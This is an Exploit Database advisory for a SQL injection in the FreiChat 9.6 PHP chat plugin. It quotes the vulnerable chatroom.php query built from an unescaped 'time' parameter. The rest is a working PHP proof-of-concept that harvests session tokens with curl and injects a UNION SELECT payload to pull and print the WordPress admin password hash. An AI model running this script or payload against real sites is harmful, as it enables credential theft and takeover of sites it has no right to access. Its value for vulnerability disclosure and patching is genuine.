FreiChat 9.6 – SQL Injection

• Exploit Database
• 52 阅读

• 作者： Kacper Szurek
  日期： 2015-07-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/37592/

• /*
  # Exploit Title: FreiChat 9.6 SQL Injection
  # Date: 27-11-2014
  # Software Link: http://codologic.com/page/freichat-free-php-chat-script-software
  # Exploit Author: Kacper Szurek
  # Contact: http://twitter.com/KacperSzurek
  # Website: http://security.szurek.pl/
  # Category: webapps
  
  1. Description
  
  $_GET['time'] is not escaped.
  
  File: freichat\server\plugins\chatroom\chatroom.php
  
  $get_mesg = $this->get_messages($_GET['time']);
  public function get_messages($time) {
  
  $frm_id = $this->frm_id;
  $result = array();
  
  if ($time == 0) {
  		//$get_mesg_query = "SELECT DISTINCT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . "AND time<2 order by time";
  } else {
  $get_mesg_query = "SELECT * FROM frei_chat WHERE frei_chat.\"to\"=" . $frm_id . " AND time>" . $time . " AND message_type<>1 order by time ";
  $result = $this->db->query($get_mesg_query)->fetchAll();
  }
  
  
  return $result;
  }
  
  http://security.szurek.pl/freichat-96-sql-injection.html
  
  2. Proof of Concept
  
  Example for WordPress integration (it will give you admin password):
  */
  
  <?php
  /*
   * Kacper Szurek
   * http://security.szurek.pl
   */
  function hack($url, $cookie, $sql ){
  
  $ckfile = dirname(__FILE__) . $cookie;
  $cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");
  
  $ch = curl_init();
  curl_setopt($ch, CURLOPT_URL, $url);
  curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
  curl_setopt($ch, CURLOPT_TIMEOUT, 10);
  curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  
  $content = curl_exec($ch);
  
  if (preg_match('|http://(.*?)/freichat/client/main\.php\?id=([a-zA-Z0-9]+)&xhash=([a-zA-Z0-9]+)|i', $content, $matches)) {
  curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=getmembers&id='.$matches[2].'&xhash='.$matches[3]);
  $content = curl_exec($ch);
  
  curl_setopt($ch, CURLOPT_URL, 'http://'.$matches[1].'/freichat/server/freichat.php?freimode=loadchatroom&id='.$matches[2].'&xhash='.$matches[3].'&in_room=1&chatroom_mesg_time=1&custom_mesg=1&time='.urlencode($sql));
  
  $content = curl_exec($ch);
  
  if (preg_match('|"room_id":"([^"]+)"|', $content, $output)) {
  echo "WordPress password user ID=1: ".$output[1];
  } else {
  echo "FAIL";
  }
  }
  
  curl_close( $ch );
  }
  
  // URL to WordPress main URL
  $url = "http://wp/";
  
  // SQL Payload
  $sql = "1 UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, user_pass FROM wp_users WHERE ID=1 -- ";
  
  $cookie = "/cookie.txt";
  
  hack($url, $cookie, $sql);